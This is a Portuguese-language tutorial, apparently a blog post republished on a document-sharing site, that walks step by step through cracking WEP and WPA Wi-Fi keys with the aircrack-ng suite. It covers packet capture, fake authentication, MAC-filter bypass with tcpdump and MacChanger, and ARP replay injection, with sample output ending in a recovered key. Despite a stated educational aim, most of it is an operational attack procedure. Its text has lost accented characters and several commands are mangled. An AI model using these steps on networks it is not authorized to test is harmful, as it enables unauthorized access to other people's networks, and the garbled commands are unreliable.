Вы находитесь на странице: 1из 26

Wireless Como quebrar Senhas De Redes WEP e WPA

http://blogdodantas.dxs.com.br/2008/05/02/wireless-como-quebrar-senhas-de-redes-wep-e-wpa/ http://www.usuariox.com.br/perguntas/173/como-quebrar-a-senha-de-uma-internet-wifi

Alguns usurios relataram que alguns roteadores novos no esto possibilitando quebrar senha WEP nem WPA. importante lembrar que o sinal da sua placa wireless tem que estar forte

H pelo menos uns quatro ou cinco software bons para quebrar segurana em redes que utilizam WEP ou WPA e o ataque, apesar de usar fora bruta e um pouco de matemtica, realmente funciona. O intuito aqui no estimular o ataque s redes disponveis e sim mostrar um pouco da fragilidade de segurana.

Vamos aos fatos, ou melhor, aos artefatos


Objetivos: Pesquisar o modo que os pacotes so transmitidos pela rede sem fio; Localizar uma forma de captar os pacotes atravs de um sniffer; Quebrar a senha WEP / WPA;

Minha pesquisa baseou-se inicialmente no modo em que os pacotes so enviados pela rede sem fio e de uma possvel forma de captar os pacotes. A partir desse princpio, localizar uma forma de quebrar a criptografia do WEP e do WPA.

A brincadeira consiste em deixar seu adaptador de rede sem fio no modo de monitoramento, para que seja capaz de ler os pacotes que esto voando e injetar de volta no Access Point gerando trfego suficiente para a quebra da chave.

O princpio o mesmo usado no modo de capturamento de pacotes das redes que utilizam hub ou os antigos cabos coaxiais: Quem estiver conectado pode chegar se aquela informao realmente lhe pertence. Se temos um adaptador wireless que esteja ao alcance do Acess Point (AP), podemos verificar os pacotes.

Nota 1:
Para poder executar os passos aqui citadoes, sua placa de rede PRECISA TER SUPORTE AO MODO DE MONITORAMENTO E INJEO DE PACOTES !
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

Nota 2
Se voc tiver que comprar uma placa de rede Wireless, aproveite para achar uma que tenha conector para acoplar anterna exeterna.

Utilitrios
Notebook rodando Backtrack ( ou qualquer outra distribuio linux) dentro de uma Virtual Machine [ abaixo explico os motivos ] Aircrack-ng, aireplay, airdump-ng [ http://www.aircrack-ng.org/ ] Adaptador Wireless USB [ ver compatibilidade no site do Aircrack ]

Por que usar linux ?


Simples: O nmero de placas que possuem suporte ao modo de monitoramento e ao modo de injeo de pacotes muito maior que no Windows. A maioria dos fabricantes desenvolve drivers que possuem este modo desabilitado para justamente evitar este tipo de ataque.

Por que usar uma Virtual Machine ?


Gosto de simplicidade: Meu notebook est com Windows e o trabalho para reparticionar o HD e instalar o linux no modo DualBoot no compensa. mais simples aproveitar os benefcios da emulao de outro sistema operacional.

No est no escopo desse post os detalhes da instalao do Linux, mas se voc tiver o VmWare (software responsvel por emular SOs), no prprio site do Aircrack j tem uma prontinha pra usar.
http://www.aicrack-ng.org/doku.php#virtual_machine1

Quebrando as senhas:
WEP Mais fcil de quebrar, pois o ataque apesar de usar fora bruta, utiliza estatstica e pedos da chave enviando nos pacotes para acelerar a quebra.

Quanto mais IVs capturados pelo Aircrack, maior a chance de quebrar. IV um pacote capturado que pode ser usado para recuperar um pedao de chave. Uma dica importante no ficar esperando a rede enviar IVs para voc e sim voc tentar aumentar o nmero de capturas com ataques ARP, chopchop e fragmentao.

1 - Rode o comando abaixo para validar os AccessPoints ativos:


Aircrack-ng interface_rede Localize AccessPoints desejado e pare o comando com crtrl+c. Vamos filtrar a execuo para garantir maior nmero de pacotes coletados. J que o scan feito por canais de 1 a 12.

2 Filtre a rede desejada por canal / bssid e deixe ele parado rodando :
aircrack-ng c canal bssid 00:00:00:00 w arquivo_saida interface_rede Onde: canal = Canal mostrado pelo comando 1

00:00:00:00 = Mac Address do AcessPoint escolhido para o ataque mostrado no comando 1


arquivo_saida = Nome do arquivo que o aplicativo ir salvar e que ser usado para capturar a senha Interface_rede = Interface wireless usada (wifi0, rausb0, etc)

Note que h colunas mostrando Beacons e Ivs.


Podemos considerar Beacons como lixo para o nosso ataque e Ivs para os pacotes que realmente interessam. Consegui quebar WEP com 5.000 Ivs mas um nmero bom, gira em torno dos 80000.

3 Abra um novo terminal para tentarmos uma autenticao FAKE


aireplay-ng -1 0 e nome a bssid h mac_sua_placa_rede interface_rede Onde: nome = ESSID da rede, ou melhor, o nome do AccessPoint que mostra pra voc no comando 1 bssid = BSSID da rede (mac address do AP)
mac_sua_placa_rede = Mac Address da sua placa de rede interface de rede = interface da rede wifi

Comando exemplo:
Se o comando funcionar, voc ver um resultado assim: 18:22:32 Sending Authentication Request 18:22:32 Authentication successfull 18:22:32 Sending Association Request 18:22:32 Association successfull 18:22:42 Sending Keep-alive packet 18:22:52 Sending Keep-alive packet Mantenha esse terminal aberto para manter a associao falsa.

Nota: Alguns AccessPoints possuem filtro de MAC Address. Caso a associao no funcione, utilize o tcpdump para achar um MAC que esteja liberado e troque o MAC da sua placa com o MacChanger.

Um exemplo de execuo de tcpdump seria: tcpdump n e s0 vvv i interface_rede

4 Execuo dos ataques


4.1 Abra um novo terminal e execute o aireplay para tentar gerar replicao de pacote ARP
aireplay ng 3 b bssid h mac_sua_placa interface_rede Onde: -3 = o tipo de ataque ARP bssid= Mac do AcessPoint mac_sua_placa = Mac Address da sua placa de rede interface_rede = Interface da rede wifi Deixe o terminal parado por alguns minutos. Esse comando precisa de alguns pacotes ARP na rede para gerar trfego. Um usurio conectado com cabo no AP suficiente para o ataque funcionar.

Exemplo de um comando que est executando com sucesso:


Saving ARP request in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

Se funcionar, voc ver o nmero de Ivs crescer absurdamente. Pare os comandos quando estiver com +- 80.000 Ivs e pule para o passo 5.

5 Descubra a chave
Aircrack-ng b bssid arquivo*.cap Onde:
Bssid = Mac do Access Point que est ativo capturando pacotes arquivo.*cap = Prefixo do arquivo colocado no comando 1

Se tudo der certo, aparecer no meio da tela: KEY FOUND! [ 12:34:56:78:90 ]

Decrypted correctly: 100%


Voc nunca achar a chave original e sempre a chave em hexa. Remova os dois pontos : e tente conectar na rede. Bingo!!

6 Se algo saiu errado..


Essa a maneira mais fcil de conseguir a quebra. H uma infinidade de jeitos de tentar gerar trfego e IVs. Aqui vo alguns links que ajudaro a entender mais sobre os ataques:
[ Forma simples de crackear ] http://www.aircrack-ng.org/doku.php?id=simple_wep_crack&s=simple%20wep%20crack
[Formas de aumentar os IVs] http://www.aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase

[Post no Warchalking] http://capivara.warchalking.com.br/forum/viewtopic.php?p=8826&sid=598caa58d4ae9c0fdfe079be733 bca4a